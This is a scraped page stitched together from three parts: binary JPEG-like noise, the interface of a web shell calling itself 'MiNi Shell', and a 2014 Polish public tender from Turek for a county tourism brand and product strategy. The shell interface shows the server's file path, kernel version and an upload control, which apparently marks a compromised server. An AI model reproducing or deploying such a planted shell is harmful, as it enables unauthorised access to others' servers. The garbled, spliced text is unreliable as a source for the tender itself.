JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140909/299614-N-2014.html

<p class="kh_header"><b>Turek: OPRACOWANIE STRATEGII MARKI I PRODUKTU TURYSTYCZNEGO DLA OBSZARU POWIATU TURECKIEGO</b><br>
<b>Numer ogłoszenia: 299614 - 2014; data zamieszczenia: 09.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Turku , ul. Kaliska 59, 62-700 Turek, woj. wielkopolskie, tel. 063 289 61 00, faks 063 289 61 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miastoturek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE STRATEGII MARKI I PRODUKTU TURYSTYCZNEGO DLA OBSZARU POWIATU TURECKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie Strategii marki i produktu turystycznego dla obszaru powiatu tureckiego. Zamówienie publiczne jest realizowane w ramach projektu pn.: Partnerstwo lokalne na rzecz rozwoju gospodarczego gmin powiatu tureckiego, dofinansowanego z funduszy EOG, pochodzących z Islandii, Liechtensteinu i Norwegii oraz środków krajowych.
Projekt realizowany jest przez Gminę Miejską Turek jako Lidera projektu w partnerstwie z:  Powiatem Tureckim,  Gminą Brudzew, Miastem i Gminą Dobra, Gminą Kawęczyn, Gminą Malanów, Gminą Przykona, Gminą i Miastem Tuliszków, Gminą Turek, Gminą Władysławów, Turecką Izbą Gospodarczą oraz Stowarzyszeniem Turkowska Unia Rozwoju T.U.R.
2.Zadanie Wykonawcy będzie polegało w szczególności na wykonaniu prac analitycznych, badawczych, koncepcyjnych i redakcyjnych prowadzących do opracowania Strategii marki i produktu turystycznego dla obszaru powiatu tureckiego, zwanej w dalszej części SIWZ - Strategią.
3.Strategia, będąca przedmiotem niniejszego zamówienia, ma stanowić materiał wyjściowy dla promocji obszarów położonych w powiecie tureckim, województwo wielkopolskie,    w tym przede wszystkim wykorzystując ich aktualny i przyszły potencjał turystyczny.
4.Opracowanie Strategii wymaga od Wykonawcy znajomości i uwzględnienia treści oraz wytycznych wynikających z dokumentów strategicznych o zasięgu ogólnopolskim, ponadregionalnym oraz regionalnym.
5.Zamówienie winno być zrealizowane zgodnie z poniższymi zasadami i założeniami, mając na względzie konieczność zawarcia w opracowaniu dokumentu części analitycznej, strategicznej oraz wniosków i rekomendacji.
6.Do niezbędnych elementów przedmiotu zamówienia zalicza się: 
a)aktualną inwentaryzację obiektów znajdujących się na obszarze powiatu tureckiego uwzględniającą:
-walory i atrakcje przyrodnicze, w tym obszary NATURA 2000
-walory i atrakcje kulturowe
-infrastrukturę ogólną
-stan zagospodarowania turystycznego
-istniejące atrakcje
-bazę noclegową
-informację turystyczną
-dostępność transportową i komunikacyjną
-transport
-imprezy turystyczne
-imprezy kulturalne
-inne usługi towarzyszące
b)szczegółowe wyselekcjonowanie ww. obiektów w kontekście ich identyfikowalności i atrakcyjności z punktu widzenia potencjalnego turysty;
c)uwzględnienie potencjału gmin ościennych: Goszczanów, Kościelec, Uniejów, mogącego mieć pozytywny wpływ na wizerunek obszaru funkcjonalnego w opracowywaniu strategii marketingowej i produktu turystycznego;
d)ocenę warunków środowiska przyrodniczego, dostępności oraz potencjału do rozwoju turystyki na tle innych regionów o podobnych uwarunkowaniach geograficznych, demograficznych, administracyjnych;
e)pojemność turystyczną obszaru;
f)segmentację rynku;
g)konkurencyjne regiony;
h)konkretne propozycje produktów lub kategorii produktów charakterystycznych dla obszaru, ze wskazaniem grup jakie winny być włączone (odpowiedzialne) za ich budowanie i wprowadzenie na rynek i utrzymanie;
i)wskazanie do realizacji w okresie 2015-2020 konkretnych projektów o charakterze zintegrowanym z uwzględnieniem zasobów ludzkich, przyrodniczych i kulturowych regionu oraz określeniem źródeł ich finansowania;
j)strategię marketingową w/w produktów turystycznych z uwzględnieniem procesu budowania marki;
k)metody aktywizacji mieszkańców, wyzwalania wśród nich inicjatyw do twórczego łączenia pasji i przedsiębiorczości (w tym uwzględnienie aspektów społeczeństwa obywatelskiego), 
l)wskazanie liderów instytucjonalnych (osobowych) poszczególnych produktów/grup produktów lokalnych oraz możliwości ich wykorzystania potencjału technicznego i osobowego.
m)promocja marki powiatu - identyfikacja wizualna obszaru powiatu tureckiego (np. wspólny dla całego obszaru znak graficzny, hasło itp. którymi będą posługiwać się wszyscy partnerzy projektu).
7.W realizacji zamówienia oferent powinien wykorzystywać metody benmarchingu (wskazywać przykłady dobrych praktyk w przedmiocie zamówienia).
8.Opracowanie strategii winno uwzględniać przeprowadzenie warsztatów, spotkań tematycznych w grupach (łącznie ok. 8-10 spotkań i warsztatów) z interesariuszami,  przeprowadzenie badań ankietowych i wywiadów pogłębionych nt. postrzegania regionu przez mieszkańców w kontekście atrakcyjności turystycznej (także kulturowej). 
Wykonawca w ramach ceny oferowanej usługi pokrywa we własnym zakresie koszty: dojazdu konsultantów i trenerów do danych jednostek samorządu terytorialnego, wyżywienia oraz ich ewentualnych noclegów, materiałów biurowych. Wykonawca w ramach ceny oferowanej zapewni środki niezbędne do przeprowadzenia działań na wszystkich etapach, w tym m.in.:
-moderacji i przygotowania merytorycznego wszystkich zaplanowanych spotkań,
-sporządzania protokołów ze spotkań,
-przygotowania zaproszeń dla uczestników,
-organizację pomieszczeń (wynajem sali, nagłośnienie, laptop, rzutnik, ekran i inne w zależności od potrzeb) - Zamawiający deklaruje współpracę w tym zakresie;
-zapewnienie odpowiedzialnych osób merytorycznych
9.Dokument należy opracować w języku polskim, a jego wersję ostateczną dostarczyć Zamawiającemu w 12 egzemplarzach drukowanych, oprawionych, w formacie A4, pełny kolor oraz w 12 egzemplarzach na elektronicznych nośnikach informacji (CD/DVD), w plikach w formacie .pdf oraz plikach źródłowych możliwych do edycji (np.doc).
10.Wykonawca zobowiązany jest przygotować prezentację multimedialną ostatecznej wersji Strategii, którą zaprezentuje przed przedstawicielami Partnerstwa, w terminie wskazanym przez Zamawiającego.
11.Wykonawca przeniesie na Zamawiającego majątkowe prawa autorskie do wszystkich elementów prac i dokumentów, powstałych w związku z opracowaniem Strategii w zakresie rozporządzania nimi i korzystania z nich przez czas nieoznaczony na wszystkich polach eksploatacji. Opracowanie będzie wykorzystywane przez partnerów projektu do realizacji projektów rozwojowych oraz aplikowaniu o środki zewnętrzne, w tym z budżetu Unii Europejskiej, w szczególności w ramach Regionalnego Programu Operacyjnego Województwa Wielkopolskiego na lata 2014-2020.
12.Strategia musi zostać opatrzona logotypami: Mechanizmu Finansowego EOG 2009-2014, Ministerstwa Infrastruktury i Rozwoju, Programu Rozwój miast poprzez wzmocnienie kompetencji jednostek samorządu terytorialnego, dialog społeczny oraz współpracę z przedstawicielami społeczeństwa obywatelskiego oraz formułką Finansowane z funduszy EOG, pochodzących z Islandii, Liechtensteinu i Norwegii oraz środków krajowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o udzielenie zamówienia publicznego zamawiający żąda wniesienia wadium przetargowego w wysokości 2000,00 zł (słownie złotych: dwa tysiące).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony, jeżeli wykonawca złoży oświadczenie w trybie art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, nabył doświadczenie w zakresie świadczenia usług eksperckich polegających na opracowaniu, co najmniej dwóch analiz strategicznych w zakresie produktu turystycznego lub opracowaniu programu rozwoju markowego produktu turystycznego lub strategii rozwoju turystyki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony, jeżeli wykonawca złoży oświadczenie w trybie art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, tj. zespołem badawczym, w skład którego wejdą co najmniej następujące osoby:
a)kierownik projektu posiadający wykształcenie wyższe oraz doświadczenie w kierowaniu co najmniej dwoma projektami, polegającymi na opracowaniu strategii produktu turystycznego lub programu rozwoju markowego produktu turystycznego lub strategii rozwoju turystyki lub innej strategii z elementami programu rozwoju markowych produktów turystycznych, które były wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert;
b)specjalista posiadający wykształcenie wyższe na studiach o kierunku etnografia, etnologia lub antropologia kulturowa,
c)specjalista w zakresie rekultywacji i rewitalizacji obszarów pokopalnianych  posiadający wykształcenie wyższe na studiach o kierunku inżynieria środowiska,
d)specjalista w zakresie marketingu, w tym prowadzenia kampanii marketingowych, posiadający wykształcenie wyższe oraz co najmniej trzyletnie doświadczenie zawodowe w zakresie marketingu miejsc, 
e)specjalista w zakresie promocji, tworzenia marki i kreowania produktów turystycznych, posiadający wykształcenie wyższe oraz co najmniej trzyletnie doświadczenie zawodowe w zakresie prowadzenia kampanii promocyjnych lub informacyjnych lub reklamowych.
Przez posiadanie doświadczenia zawodowego z ppkt d) i e) należy rozumieć, co najmniej trzyletnie zatrudnienie na stanowisku pracy o zakresie obejmującym wykonywanie czynności zawodowych o których mowa wyżej w ppkt d) lub e) lub wykonywanie przez ten okres działalności gospodarczej odpowiednio obejmującej  wymienione wyżej czynności zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony, jeżeli wykonawca złoży oświadczenie w trybie art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych

Jeżeli wykonawca , wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wówczas zamawiający żąda od wykonawcy złożenia wraz z ofertą dokumentów dotyczących:
-zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
- charakteru stosunku, jaki będzie łączył wykonawcę i z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie i w granicach art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, zamawiający dopuszcza możliwość zmiany zawartej umowy: 
1)W zakresie terminów realizacji umowy - w sytuacji, gdy zmiana ta jest spowodowana czynnikami niezależnymi od obu stron bądź czynnikami zależnymi od zamawiającego, a czynniki te uniemożliwiają wywiązanie się wykonawcy z terminów wskazanych w umowie. 
2)Gdy zmieniony zostanie termin lub sposób płatności wynagrodzenia za wykonanie zamówienia w stosunku do postanowień umowy. 
3)Gdy pomniejszony zostanie zakres umowy,  połączony w takim przypadku z pomniejszeniem wynagrodzenia w stosunku do określonego w umowie. Jeżeli strony umowy nie dojdą do porozumienia w inny sposób, pomniejszenie wynagrodzenia nastąpi w takim przypadku w oparciu o opinię biegłego rzeczoznawcy powołanego do wyceny pomniejszonego zakresu. Koszty wydania opinii ponosi strona umowy, która wystąpi o wskazaną zmianę umowy, chyba że konieczność zmniejszenia zakresu rzeczowego umowy będzie wynikiem postępowania strony drugiej. 
4)Gdy wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy zgodnie z jej celem lub w celu jednoznacznej interpretacji jej zapisów przez wykonawcę i zamawiającego. 
2.Ponadto, przewiduje się możliwość zmiany postanowień umowy w przypadku, gdy: 
1)nastąpi zmiana powszechnie lub miejscowo obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje umowy; 
2)konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy zamawiającym a inną niż wykonawca stroną. 
3.Dopuszczone będą ponadto zmiany nie sprzeciwiające się postanowieniom art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tj. takie, które nie będą dotyczyć istotnych postanowień zawartej umowy w stosunku do oferty, na podstawie, której dokonano wyboru wykonawcy, z którym zawarta została niniejsza umowa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastoturek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 
Biuro Zamówień Publicznych i Zakupów
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2014 godzina 11:00, miejsce: Urząd Miejski 
Biuro Obsługi Klienta
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Do kontaktów z wykonawcami zamawiający upoważnia następujące osoby: 
Zbigniew Misiek - pokój nr 122, tel. 63 289 61 17, faks 63 289 61 59 - w sprawach dotyczących procedury postępowania;
Magdalena Ciołek - tel.  63 289 36 57, e-mail: magdalena.ciolek@lgd-tur.org.pl w sprawach dotyczących przedmiotu zamówienia.
Zamówienie publiczne jest realizowane w ramach projektu pn.: Partnerstwo lokalne na rzecz rozwoju gospodarczego gmin powiatu tureckiego, dofinansowanego z funduszy EOG, pochodzących z Islandii, Liechtensteinu i Norwegii oraz środków krajowych.
Zgodnie z art. 27 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oświadczenia, wnioski, zawiadomienia oraz informacje w zakresie wszelkiej korespondencji między stronami postępowania zamawiający i wykonawcy przekazują w postępowaniu w formie pisemnej lub faksem (nr telefaksu zamawiającego 63 289 61 59)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com